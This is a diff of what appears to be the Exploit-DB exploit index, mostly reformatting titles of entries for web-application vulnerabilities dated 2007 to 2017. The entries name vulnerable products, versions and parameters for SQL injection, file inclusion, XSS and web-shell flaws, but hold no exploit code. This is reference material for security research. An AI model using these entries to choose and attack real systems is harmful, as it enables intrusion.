30699,platforms/php/webapps/30699.txt,"Hackish 1.1 - Blocco.php Cross-Site Scripting",2007-10-22,Matrix86,php,webapps,0 30700,platforms/php/webapps/30700.txt,"deeemm CMS (dmcms) 0.7 - 'index.php' SQL Injection",2007-10-22,"Aria-Security Team",php,webapps,0 -30701,platforms/php/webapps/30701.txt,"Jeebles Technology Jeebles Directory 2.9.60 - download.php Local File Inclusion",2007-10-22,hack2prison,php,webapps,0 +30701,platforms/php/webapps/30701.txt,"Jeebles Technology Jeebles Directory 2.9.60 - 'download.php' Local File Inclusion",2007-10-22,hack2prison,php,webapps,0 30703,platforms/php/webapps/30703.txt,"Japanese PHP Gallery Hosting - Arbitrary File Upload",2007-10-23,"Pete Houston",php,webapps,0 30704,platforms/jsp/webapps/30704.txt,"Korean GHBoard FlashUpload Component - download.jsp name Parameter Arbitrary File Access",2007-10-23,Xcross87,jsp,webapps,0 30705,platforms/jsp/webapps/30705.txt,"Korean GHBoard - Component/upload.jsp Unspecified Arbitrary File Upload",2007-10-23,Xcross87,jsp,webapps,0 30706,platforms/asp/webapps/30706.txt,"CodeWidgets Web Based Alpha Tabbed Address Book - index.asp SQL Injection",2007-10-24,"Aria-Security Team",asp,webapps,0 -30707,platforms/php/webapps/30707.txt,"PHPbasic basicFramework 1.0 - Includes.php Remote File Inclusion",2007-10-24,Alucar,php,webapps,0 +30707,platforms/php/webapps/30707.txt,"PHPbasic basicFramework 1.0 - 'Includes.php' Remote File Inclusion",2007-10-24,Alucar,php,webapps,0 30708,platforms/asp/webapps/30708.txt,"Aleris Web Publishing Server 3.0 - Page.asp SQL Injection",2007-10-25,joseph.giron13,asp,webapps,0 30712,platforms/php/webapps/30712.txt,"Multi-Forums - 'Directory.php' Multiple SQL Injections",2007-10-25,KiNgOfThEwOrLd,php,webapps,0 30715,platforms/php/webapps/30715.txt,"WordPress 2.3 - Edit-Post-Rows.php Cross-Site Scripting",2007-10-29,waraxe,php,webapps,0 @@ -31995,7 +31999,7 @@ id,file,description,date,author,platform,type,port 30733,platforms/php/webapps/30733.txt,"phpMyAdmin 2.11.1 - Server_Status.php Cross-Site Scripting",2007-10-17,"Omer Singer",php,webapps,0 30734,platforms/php/webapps/30734.txt,"Helios Calendar 1.1/1.2 - admin/index.php Cross-Site Scripting",2007-11-02,"Ivan Sanchez",php,webapps,0 30735,platforms/php/webapps/30735.txt,"PHP Helpdesk 0.6.16 - 'index.php' Local File Inclusion",2007-11-03,joseph.giron13,php,webapps,0 -30737,platforms/php/webapps/30737.txt,"Galmeta Post 0.2 - Upload_Config.php Remote File Inclusion",2007-11-05,"arfis project",php,webapps,0 +30737,platforms/php/webapps/30737.txt,"Galmeta Post 0.2 - 'Upload_Config.php' Remote File Inclusion",2007-11-05,"arfis project",php,webapps,0 30738,platforms/php/webapps/30738.txt,"E-Vendejo 0.2 - Articles.php SQL Injection",2007-11-05,r00t,php,webapps,0 30739,platforms/php/webapps/30739.txt,"JLMForo System - Buscado.php Cross-Site Scripting",2007-11-05,"Jose Luis Gongora Fernandez",php,webapps,0 30741,platforms/php/webapps/30741.txt,"easyGB 2.1.1 - 'index.php' Local File Inclusion",2007-11-05,"BorN To K!LL",php,webapps,0 @@ -32082,7 +32086,7 @@ id,file,description,date,author,platform,type,port 30918,platforms/php/webapps/30918.txt,"iDevSpot iSupport 1.8 - 'index.php' Local File Inclusion",2007-12-20,JuMp-Er,php,webapps,0 30919,platforms/cgi/webapps/30919.txt,"SiteScape Forum - 'dispatch.cgi' Tcl Command Injection",2007-12-20,niekt0,cgi,webapps,0 30921,platforms/php/webapps/30921.txt,"MRBS 1.2.x - 'view_entry.php' SQL Injection",2007-12-21,root@hanicker.it,php,webapps,0 -30923,platforms/php/webapps/30923.txt,"MyBlog 1.x - Games.php ID Remote File Inclusion",2007-12-22,"Beenu Arora",php,webapps,0 +30923,platforms/php/webapps/30923.txt,"MyBlog 1.x - 'Games.php' 'ID' Remote File Inclusion",2007-12-22,"Beenu Arora",php,webapps,0 30924,platforms/php/webapps/30924.txt,"Dokeos 1.x - forum/viewthread.php forum Parameter Cross-Site Scripting",2007-12-22,Doz,php,webapps,0 30925,platforms/php/webapps/30925.txt,"Dokeos 1.x - forum/viewforum.php forum Parameter Cross-Site Scripting",2007-12-22,Doz,php,webapps,0 30926,platforms/php/webapps/30926.txt,"Dokeos 1.x - work/work.php display_upload_form Action origin Parameter Cross-Site Scripting",2007-12-22,Doz,php,webapps,0 @@ -32348,7 +32352,7 @@ id,file,description,date,author,platform,type,port 31317,platforms/php/webapps/31317.txt,"NetOffice Dwins 1.3 - Authentication Bypass / Arbitrary File Upload",2008-02-29,RawSecurity.org,php,webapps,0 31318,platforms/php/webapps/31318.txt,"Centreon 1.4.2.3 - 'index.php' Local File Inclusion",2008-02-29,JosS,php,webapps,0 31319,platforms/php/webapps/31319.txt,"Simple PHP Scripts Gallery 0.x - 'index.php' Cross-Site Scripting",2008-02-29,ZoRLu,php,webapps,0 -31320,platforms/php/webapps/31320.txt,"PHPMyTourney 2 - tourney/index.php Remote File Inclusion",2008-02-29,"HACKERS PAL",php,webapps,0 +31320,platforms/php/webapps/31320.txt,"PHPMyTourney 2 - 'tourney/index.php' Remote File Inclusion",2008-02-29,"HACKERS PAL",php,webapps,0 31321,platforms/php/webapps/31321.txt,"Heathco Software h2desk - Multiple Information Disclosure Vulnerabilities",2008-03-01,joseph.giron13,php,webapps,0 31322,platforms/php/webapps/31322.txt,"PHP-Nuke Johannes Hass 'Gaestebuch 2.2 Module - 'id' Parameter SQL Injection",2008-03-01,TurkishWarriorr,php,webapps,0 31324,platforms/php/webapps/31324.txt,"KC Wiki 1.0 - minimal/wiki.php page Parameter Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0 @@ -32429,15 +32433,15 @@ id,file,description,date,author,platform,type,port 31446,platforms/jsp/webapps/31446.txt,"Elastic Path 4.1 - 'manager/FileManager.jsp' 'dir' Parameter Traversal Arbitrary Directory Listing",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 31447,platforms/php/webapps/31447.txt,"News-Template 0.5beta - 'print.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-20,ZoRLu,php,webapps,0 31448,platforms/php/webapps/31448.txt,"Joomla! / Mambo Component Datsogallery 1.3.1 - 'id' Parameter SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0 -31449,platforms/php/webapps/31449.txt,"W-Agora 4.0 - add_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 -31450,platforms/php/webapps/31450.txt,"W-Agora 4.0 - create_forum.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 -31451,platforms/php/webapps/31451.txt,"W-Agora 4.0 - create_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 -31452,platforms/php/webapps/31452.txt,"W-Agora 4.0 - delete_notes.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 -31453,platforms/php/webapps/31453.txt,"W-Agora 4.0 - delete_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 -31454,platforms/php/webapps/31454.txt,"W-Agora 4.0 - edit_forum.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 -31455,platforms/php/webapps/31455.txt,"W-Agora 4.0 - mail_users.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 -31456,platforms/php/webapps/31456.txt,"W-Agora 4.0 - moderate_notes.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 -31457,platforms/php/webapps/31457.txt,"W-Agora 4.0 - reorder_forums.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31449,platforms/php/webapps/31449.txt,"W-Agora 4.0 - 'add_user.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31450,platforms/php/webapps/31450.txt,"W-Agora 4.0 - 'create_forum.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31451,platforms/php/webapps/31451.txt,"W-Agora 4.0 - 'create_user.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31452,platforms/php/webapps/31452.txt,"W-Agora 4.0 - 'delete_notes.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31453,platforms/php/webapps/31453.txt,"W-Agora 4.0 - 'delete_user.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31454,platforms/php/webapps/31454.txt,"W-Agora 4.0 - 'edit_forum.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31455,platforms/php/webapps/31455.txt,"W-Agora 4.0 - 'mail_users.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31456,platforms/php/webapps/31456.txt,"W-Agora 4.0 - 'moderate_notes.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31457,platforms/php/webapps/31457.txt,"W-Agora 4.0 - 'reorder_forums.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 31458,platforms/php/webapps/31458.txt,"PHP Webcam Video Conference - Multiple Vulnerabilities",2014-02-06,vinicius777,php,webapps,80 31459,platforms/php/webapps/31459.txt,"Joomla! 3.2.1 - SQL Injection",2014-02-06,killall-9,php,webapps,80 31469,platforms/php/webapps/31469.txt,"ooComments 1.0 - classes/class_admin.php PathToComment Parameter Remote File Inclusion",2008-03-22,ZoRLu,php,webapps,0 @@ -32859,7 +32863,7 @@ id,file,description,date,author,platform,type,port 32092,platforms/php/webapps/32092.txt,"Flip 3.0 - 'config.php' Remote File Inclusion",2008-07-21,Cru3l.b0y,php,webapps,0 32093,platforms/php/webapps/32093.txt,"PHPKF - 'forum_duzen.php' SQL Injection",2008-07-21,U238,php,webapps,0 32096,platforms/php/webapps/32096.pl,"EasyE-Cards 3.10 - SQL Injection / Cross-Site Scripting",2008-07-21,Dr.Crash,php,webapps,0 -32097,platforms/php/webapps/32097.txt,"XOOPS 2.0.18 - modules/system/admin.php fct Parameter Traversal Local File Inclusion",2008-07-21,Ciph3r,php,webapps,0 +32097,platforms/php/webapps/32097.txt,"XOOPS 2.0.18 - 'modules/system/admin.php' 'fct' Parameter Traversal Local File Inclusion",2008-07-21,Ciph3r,php,webapps,0 32098,platforms/php/webapps/32098.txt,"XOOPS 2.0.18 - modules/system/admin.php fct Parameter Cross-Site Scripting",2008-07-21,Ciph3r,php,webapps,0 32099,platforms/php/webapps/32099.txt,"RunCMS 1.6.1 - 'bbPath[path]' Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0 32100,platforms/php/webapps/32100.txt,"RunCMS 1.6.1 - 'bbPath[root_theme]' Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0 @@ -33117,7 +33121,7 @@ id,file,description,date,author,platform,type,port 32542,platforms/php/webapps/32542.txt,"Elkagroup Image Gallery 1.0 - 'view.php' SQL Injection",2008-10-28,G4N0K,php,webapps,0 32543,platforms/php/webapps/32543.txt,"KKE Info Media Kmita Catalogue 2 - 'search.php' Cross-Site Scripting",2008-10-28,cize0f,php,webapps,0 32544,platforms/php/webapps/32544.txt,"KKE Info Media Kmita Gallery - Multiple Cross-Site Scripting Vulnerabilities",2008-10-29,cize0f,php,webapps,0 -32545,platforms/hardware/webapps/32545.txt,"Allied Telesis AT-RG634A ADSL Broadband Router - Unauthenticated Webshell",2014-03-26,"Groundworks Technologies",hardware,webapps,80 +32545,platforms/hardware/webapps/32545.txt,"Allied Telesis AT-RG634A ADSL Broadband Router - Unauthenticated Web Shell",2014-03-26,"Groundworks Technologies",hardware,webapps,80 32546,platforms/php/webapps/32546.py,"IBM Tealeaf CX 8.8 - Remote OS Command Injection",2014-03-26,drone,php,webapps,0 32547,platforms/php/webapps/32547.txt,"Extrakt Framework 0.7 - 'index.php' Cross-Site Scripting",2008-10-29,ShockShadow,php,webapps,0 32549,platforms/asp/webapps/32549.txt,"Dorsa CMS - 'Default_.aspx' Cross-Site Scripting",2008-10-29,Pouya_Server,asp,webapps,0 @@ -33865,7 +33869,7 @@ id,file,description,date,author,platform,type,port 33972,platforms/php/webapps/33972.txt,"Advanced Poll 2.0 - 'mysql_host' Parameter Cross-Site Scripting",2010-05-10,"High-Tech Bridge SA",php,webapps,0 33975,platforms/php/webapps/33975.html,"Affiliate Store Builder - 'edit_cms.php' Multiple SQL Injections",2010-05-11,"High-Tech Bridge SA",php,webapps,0 33978,platforms/php/webapps/33978.txt,"TomatoCMS 2.0.x - SQL Injection",2010-05-12,"Russ McRee",php,webapps,0 -33979,platforms/php/webapps/33979.txt,"C99Shell 1.0 Pre-Release build 16 - 'ch99.php' Cross-Site Scripting",2010-05-19,indoushka,php,webapps,0 +33979,platforms/php/webapps/33979.txt,"C99Shell 1.0 Pre-Release build 16 (Web Shell) - 'ch99.php' Cross-Site Scripting",2010-05-19,indoushka,php,webapps,0 33982,platforms/php/webapps/33982.txt,"NPDS REvolution 10.02 - 'download.php' SQL Injection",2010-05-13,"High-Tech Bridge SA",php,webapps,0 33983,platforms/php/webapps/33983.txt,"Frog CMS 0.9.5 - Arbitrary File Upload",2014-07-06,"Javid Hussain",php,webapps,0 33985,platforms/php/webapps/33985.txt,"NPDS REvolution 10.02 - 'topic' Parameter Cross-Site Scripting",2010-05-13,"High-Tech Bridge SA",php,webapps,0 @@ -33895,7 +33899,7 @@ id,file,description,date,author,platform,type,port 34023,platforms/php/webapps/34023.txt,"Lisk CMS 4.4 - 'id' Parameter Multiple Cross-Site Scripting / SQL Injection",2010-05-20,"High-Tech Bridge SA",php,webapps,0 34024,platforms/php/webapps/34024.txt,"Triburom - 'forum.php' Cross-Site Scripting",2010-01-15,ViRuSMaN,php,webapps,0 34030,platforms/lin_x86/webapps/34030.txt,"Infoblox 6.8.2.11 - OS Command Injection",2014-07-10,"Nate Kettlewell",lin_x86,webapps,0 -34025,platforms/php/webapps/34025.txt,"C99 Shell - 'c99.php' Authentication Bypass",2014-07-10,Mandat0ry,php,webapps,0 +34025,platforms/php/webapps/34025.txt,"C99Shell (Web Shell) - 'c99.php' Authentication Bypass",2014-07-10,Mandat0ry,php,webapps,0 34029,platforms/php/webapps/34029.txt,"Specialized Data Systems Parent Connect 2010.04.11 - Multiple SQL Injections",2010-05-21,epixoip,php,webapps,0 34031,platforms/php/webapps/34031.txt,"gpEasy CMS 1.6.2 - 'editing_files.php' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0 34032,platforms/php/webapps/34032.txt,"NPDS REvolution 10.02 - 'admin.php' Cross-Site Request Forgery",2010-05-20,"High-Tech Bridge SA",php,webapps,0 @@ -34468,7 +34472,7 @@ id,file,description,date,author,platform,type,port 34902,platforms/php/webapps/34902.txt,"PHP Scripts Now Riddles - '/riddles/results.php' 'searchQuery' Parameter Cross-Site Scripting",2009-08-20,Moudi,php,webapps,0 34903,platforms/php/webapps/34903.txt,"PHP Scripts Now Riddles - '/riddles/list.php' 'catid' Parameter SQL Injection",2009-08-20,Moudi,php,webapps,0 34904,platforms/php/webapps/34904.txt,"Radvision Scopia - 'entry/index.jsp' Cross-Site Scripting",2009-08-24,"Francesco Bianchino",php,webapps,0 -34905,platforms/php/webapps/34905.txt,"W-Agora 4.2.1 - search.php3 bn Parameter Traversal Local File Inclusion",2010-10-22,MustLive,php,webapps,0 +34905,platforms/php/webapps/34905.txt,"W-Agora 4.2.1 - 'search.php3' 'bn' Parameter Traversal Local File Inclusion",2010-10-22,MustLive,php,webapps,0 34906,platforms/php/webapps/34906.txt,"W-Agora 4.2.1 - search.php bn Parameter Cross-Site Scripting",2010-10-22,MustLive,php,webapps,0 34907,platforms/multiple/webapps/34907.txt,"IBM Tivoli Access Manager for E-Business - ivt/ivtserver parm1 Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 34908,platforms/multiple/webapps/34908.txt,"IBM Tivoli Access Manager for E-Business - ibm/wpm/acl method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 @@ -34993,7 +34997,7 @@ id,file,description,date,author,platform,type,port 35775,platforms/ios/webapps/35775.txt,"Foxit MobilePDF 4.4.0 iOS - Multiple Vulnerabilities",2015-01-13,Vulnerability-Lab,ios,webapps,8888 35781,platforms/java/webapps/35781.txt,"CiscoWorks Common Services 3.1.1 - Auditing Directory Traversal",2011-05-18,"Sense of Security",java,webapps,0 35782,platforms/php/webapps/35782.txt,"Room Juice 0.3.3 - 'display.php' Cross-Site Scripting",2011-05-19,"AutoSec Tools",php,webapps,0 -35783,platforms/php/webapps/35783.html,"Andy's PHP KnowledgeBase 0.95.4 - 'step5.php' Remote PHP Code Execution",2011-05-19,"AutoSec Tools",php,webapps,0 +35783,platforms/php/webapps/35783.html,"Andy's PHP KnowledgeBase 0.95.4 - 'step5.php' PHP Remote Code Execution",2011-05-19,"AutoSec Tools",php,webapps,0 35787,platforms/php/webapps/35787.txt,"LimeSurvey 1.85+ - 'admin.php' Cross-Site Scripting",2011-05-19,"Juan Manuel Garcia",php,webapps,0 35788,platforms/php/webapps/35788.txt,"Joomla! Component Map Locator - 'cid' Parameter SQL Injection",2011-05-23,FL0RiX,php,webapps,0 35789,platforms/php/webapps/35789.txt,"phpScheduleIt 1.2.12 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-24,"High-Tech Bridge SA",php,webapps,0 @@ -35895,7 +35899,7 @@ id,file,description,date,author,platform,type,port 37131,platforms/php/webapps/37131.txt,"MySQLDumper 1.24.4 - main.php Multiple Function Cross-Site Request Forgery",2012-04-27,AkaStep,php,webapps,0 37132,platforms/php/webapps/37132.txt,"WordPress Plugin Free Counter 1.1 - Persistent Cross-Site Scripting",2015-05-27,"Panagiotis Vagenas",php,webapps,80 37133,platforms/php/webapps/37133.txt,"MySQLDumper 1.24.4 - 'index.php' page Parameter Cross-Site Scripting",2012-04-27,AkaStep,php,webapps,0 -37134,platforms/php/webapps/37134.php,"MySQLDumper 1.24.4 - 'menu.php' Remote PHP Code Execution",2012-04-27,AkaStep,php,webapps,0 +37134,platforms/php/webapps/37134.php,"MySQLDumper 1.24.4 - 'menu.php' PHP Remote Code Execution",2012-04-27,AkaStep,php,webapps,0 37135,platforms/hardware/webapps/37135.txt,"iGuard Security Access Control Device Firmware 3.6.7427A - Cross-Site Scripting",2012-05-02,"Usman Saeed",hardware,webapps,0 37136,platforms/php/webapps/37136.txt,"Trombinoscope 3.x - 'photo.php' Server SQL Injection",2012-05-07,"Ramdan Yantu",php,webapps,0 37137,platforms/php/webapps/37137.txt,"Schneider Electric Telecontrol Kerweb 3.0.0/6.0.0 - 'kw.dll' HTML Injection",2012-05-06,phocean,php,webapps,0 @@ -36278,7 +36282,7 @@ id,file,description,date,author,platform,type,port 37725,platforms/php/webapps/37725.txt,"Froxlor Server Management Panel 0.9.33.1 - MySQL Login Information Disclosure",2015-08-07,"Dustin Dörr",php,webapps,0 37726,platforms/php/webapps/37726.txt,"PHP News Script 4.0.0 - SQL Injection",2015-08-07,"Meisam Monsef",php,webapps,80 37734,platforms/php/webapps/37734.html,"Microweber 1.0.3 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-07,LiquidWorm,php,webapps,80 -37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80 +37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / PHP Remote Code Execution",2015-08-07,LiquidWorm,php,webapps,80 37753,platforms/php/webapps/37753.txt,"WordPress Plugin Simple Image Manipulator 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 37738,platforms/php/webapps/37738.txt,"WordPress Plugin Job Manager 0.7.22 - Persistent Cross-Site Scripting",2015-08-07,"Owais Mehtab",php,webapps,80 37824,platforms/php/webapps/37824.txt,"WordPress Plugin WP Symposium 15.1 - 'get_album_item.php' SQL Injection",2015-08-18,PizzaHatHacker,php,webapps,80 @@ -36289,7 +36293,7 @@ id,file,description,date,author,platform,type,port 37950,platforms/php/webapps/37950.txt,"jCore - '/admin/index.php' 'path' Parameter Cross-Site Scripting",2012-10-17,"High-Tech Bridge",php,webapps,0 37757,platforms/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XXE Exploit",2015-08-12,"David Bloom",multiple,webapps,0 37761,platforms/ios/webapps/37761.txt,"Printer Pro 5.4.3 IOS - Persistent Cross-Site Scripting",2015-08-12,"Taurus Omar",ios,webapps,0 -37765,platforms/multiple/webapps/37765.txt,"Zend Framework 2.4.2 - XML eXternal Entity Injection (XXE) on PHP FPM",2015-08-13,"Dawid Golunski",multiple,webapps,0 +37765,platforms/multiple/webapps/37765.txt,"Zend Framework 2.4.2 - PHP FPM XML eXternal Entity Injection",2015-08-13,"Dawid Golunski",multiple,webapps,0 37767,platforms/multiple/webapps/37767.txt,"Joomla! Component 'com_jem' 2.1.4 - Multiple Vulnerabilities",2015-08-13,"Martino Sani",multiple,webapps,0 37769,platforms/php/webapps/37769.txt,"Gkplugins Picasaweb - Download File",2015-08-15,"TMT zno",php,webapps,0 37770,platforms/hardware/webapps/37770.txt,"TOTOLINK Routers - Backdoor and Remote Code Execution (PoC)",2015-08-15,MadMouse,hardware,webapps,0 @@ -36319,7 +36323,7 @@ id,file,description,date,author,platform,type,port 37805,platforms/php/webapps/37805.txt,"TAGWORX.CMS - 'cid' Parameter SQL Injection",2012-09-18,Crim3R,php,webapps,0 37806,platforms/cgi/webapps/37806.txt,"AxisInternet VoIP Manager - Multiple Cross-Site Scripting Vulnerabilities",2012-09-18,"Benjamin Kunz Mejri",cgi,webapps,0 37807,platforms/php/webapps/37807.txt,"vBulletin 4.1.12 - 'blog_plugin_useradmin.php' SQL Injection",2012-09-18,Am!r,php,webapps,0 -37809,platforms/php/webapps/37809.php,"Nuts CMS - Remote PHP Code Injection / Execution",2015-08-17,"Yakir Wizman",php,webapps,80 +37809,platforms/php/webapps/37809.php,"Nuts CMS - PHP Remote Code Injection / Execution",2015-08-17,"Yakir Wizman",php,webapps,80 37811,platforms/php/webapps/37811.py,"Magento CE < 1.9.0.1 - Authenticated Remote Code Execution",2015-08-18,Ebrietas0,php,webapps,80 37817,platforms/php/webapps/37817.txt,"PHPfileNavigator 2.3.3 - Cross-Site Scripting",2015-08-18,hyp3rlinx,php,webapps,80 37818,platforms/php/webapps/37818.txt,"PHPfileNavigator 2.3.3 - Cross-Site Request Forgery",2015-08-18,hyp3rlinx,php,webapps,80 @@ -36649,7 +36653,7 @@ id,file,description,date,author,platform,type,port 38487,platforms/php/webapps/38487.txt,"WordPress Theme Colormix - Multiple Vulnerabilities",2013-04-21,MustLive,php,webapps,0 38488,platforms/hardware/webapps/38488.txt,"Belkin Router N150 1.00.08/1.00.09 - Directory Traversal",2015-10-19,"Rahul Pratap Singh",hardware,webapps,0 38491,platforms/php/webapps/38491.php,"SMF - 'index.php' HTML Injection / Multiple PHP Code Injection Vulnerabilities",2013-04-23,"Jakub Galczyk",php,webapps,0 -38494,platforms/php/webapps/38494.txt,"WordPress Plugin WP Super Cache - Remote PHP Code Execution",2013-04-24,anonymous,php,webapps,0 +38494,platforms/php/webapps/38494.txt,"WordPress Plugin WP Super Cache - PHP Remote Code Execution",2013-04-24,anonymous,php,webapps,0 38496,platforms/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple Cross-Site Request Forgery / Persistent Cross-Site Scripting Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0 38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Time-Based Blind SQL Injections",2015-10-19,LiquidWorm,php,webapps,0 38499,platforms/php/webapps/38499.html,"PHPValley Micro Jobs Site Script - Spoofing",2013-04-27,"Jason Whelan",php,webapps,0 @@ -36750,7 +36754,7 @@ id,file,description,date,author,platform,type,port 38679,platforms/php/webapps/38679.txt,"Alienvault Open Source SIEM (OSSIM) - Multiple Cross-Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0 38682,platforms/php/webapps/38682.txt,"Jahia xCM - '/engines/manager.jsp' 'site' Parameter Cross-Site Scripting",2013-07-31,"High-Tech Bridge",php,webapps,0 38683,platforms/php/webapps/38683.txt,"Jahia xCM - '/administration/' Multiple Parameter Cross-Site Scripting",2013-07-31,"High-Tech Bridge",php,webapps,0 -38688,platforms/php/webapps/38688.txt,"b374k Web Shell 3.2.3/2.8 - Cross-Site Request Forgery / Command Injection",2015-11-13,hyp3rlinx,php,webapps,0 +38688,platforms/php/webapps/38688.txt,"b374k 3.2.3/2.8 (Web Shell) - Cross-Site Request Forgery / Command Injection",2015-11-13,hyp3rlinx,php,webapps,0 38689,platforms/php/webapps/38689.txt,"Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure",2013-08-01,"Fara Rustein",php,webapps,0 38691,platforms/cgi/webapps/38691.txt,"Kwok Information Server - Multiple SQL Injections",2013-08-07,"Yogesh Phadtare",cgi,webapps,0 38693,platforms/php/webapps/38693.txt,"Advanced Guestbook - 'addentry.php' Arbitrary File Upload",2013-08-08,"Ashiyane Digital Security Team",php,webapps,0 @@ -36941,7 +36945,7 @@ id,file,description,date,author,platform,type,port 39064,platforms/php/webapps/39064.txt,"Maian Uploader 4.0 - Multiple Vulnerabilities",2014-01-24,KedAns-Dz,php,webapps,0 39065,platforms/php/webapps/39065.txt,"Eventum - Insecure File Permissions",2014-01-27,"High-Tech Bridge",php,webapps,0 39066,platforms/php/webapps/39066.txt,"Eventum 2.3.4 - 'hostname' Parameter Remote Code Execution",2014-01-28,"High-Tech Bridge",php,webapps,0 -39068,platforms/php/webapps/39068.txt,"Ovidentia online Module 2.8 - GLOBALS[babAddonPhpPath] Remote File Inclusion",2015-12-21,bd0rk,php,webapps,0 +39068,platforms/php/webapps/39068.txt,"Ovidentia online Module 2.8 - 'GLOBALS[babAddonPhpPath]' Remote File Inclusion",2015-12-21,bd0rk,php,webapps,0 39069,platforms/php/webapps/39069.pl,"Ovidentia Widgets 1.0.61 - Remote Command Execution",2015-12-21,bd0rk,php,webapps,80 39078,platforms/php/webapps/39078.txt,"Web Video Streamer - Multiple Vulnerabilities",2014-01-22,"Eric Sesterhenn",php,webapps,0 39079,platforms/php/webapps/39079.txt,"Atmail WebMail - Message Attachment File Name Reflected Cross-Site Scripting",2013-03-25,"Vicente Aguilera Diaz",php,webapps,0 @@ -37005,7 +37009,7 @@ id,file,description,date,author,platform,type,port 39179,platforms/php/webapps/39179.txt,"CMS Touch - 'news.php' News_ID Parameter SQL Injection",2014-05-08,indoushka,php,webapps,0 39184,platforms/hardware/webapps/39184.txt,"MediaAccess TG788vn - Unauthenticated File Disclosure",2016-01-06,0x4148,hardware,webapps,0 39187,platforms/asp/webapps/39187.txt,"CIS Manager - 'email' Parameter SQL Injection",2014-05-16,Edge,asp,webapps,0 -39188,platforms/php/webapps/39188.txt,"XOOPS Glossaire Module- '/modules/glossaire/glossaire-aff.php' SQL Injection",2014-05-19,AtT4CKxT3rR0r1ST,php,webapps,0 +39188,platforms/php/webapps/39188.txt,"XOOPS Glossaire Module - '/modules/glossaire/glossaire-aff.php' SQL Injection",2014-05-19,AtT4CKxT3rR0r1ST,php,webapps,0 39189,platforms/php/webapps/39189.txt,"Softmatica SMART iPBX - Multiple SQL Injections",2014-05-19,AtT4CKxT3rR0r1ST,php,webapps,0 39190,platforms/php/webapps/39190.php,"WordPress Plugin cnhk-Slideshow - Arbitrary File Upload",2014-05-18,"Ashiyane Digital Security Team",php,webapps,0 39191,platforms/php/webapps/39191.txt,"Clipperz Password Manager - 'backend/PHP/src/setup/rpc.php' Remote Code Execution",2014-05-20,"Manish Tanwar",php,webapps,0 @@ -37469,7 +37473,7 @@ id,file,description,date,author,platform,type,port 40293,platforms/php/webapps/40293.txt,"chatNow - Multiple Vulnerabilities",2016-08-23,HaHwul,php,webapps,80 40295,platforms/php/webapps/40295.txt,"WordPress Plugin CYSTEME Finder 1.3 - Arbitrary File Disclosure/Arbitrary File Upload",2016-08-24,T0w3ntum,php,webapps,80 40312,platforms/php/webapps/40312.txt,"FreePBX 13.0.35 - SQL Injection",2016-08-29,i-Hmx,php,webapps,0 -40324,platforms/jsp/webapps/40324.txt,"ZKTeco ZKBioSecurity 3.0 - Hard-Coded Credentials Remote SYSTEM Code Execution",2016-08-31,LiquidWorm,jsp,webapps,8088 +40324,platforms/jsp/webapps/40324.txt,"ZKTeco ZKBioSecurity 3.0 - Hard-Coded Credentials SYSTEM Remote Code Execution",2016-08-31,LiquidWorm,jsp,webapps,8088 40325,platforms/jsp/webapps/40325.html,"ZKTeco ZKBioSecurity 3.0 - Cross-Site Request Forgery (Add Superadmin)",2016-08-31,LiquidWorm,jsp,webapps,8088 40326,platforms/jsp/webapps/40326.txt,"ZKTeco ZKBioSecurity 3.0 - Directory Traversal",2016-08-31,LiquidWorm,jsp,webapps,8088 40327,platforms/jsp/webapps/40327.txt,"ZKTeco ZKBioSecurity 3.0 - 'visLogin.jsp' Local Authentication Bypass",2016-08-31,LiquidWorm,jsp,webapps,0 @@ -38528,4 +38532,8 @@ id,file,description,date,author,platform,type,port 42738,platforms/asp/webapps/42738.py,"DigiAffiliate 1.4 - Cross-Site Request Forgery (Update Admin)",2017-09-18,"Ihsan Sencan",asp,webapps,0 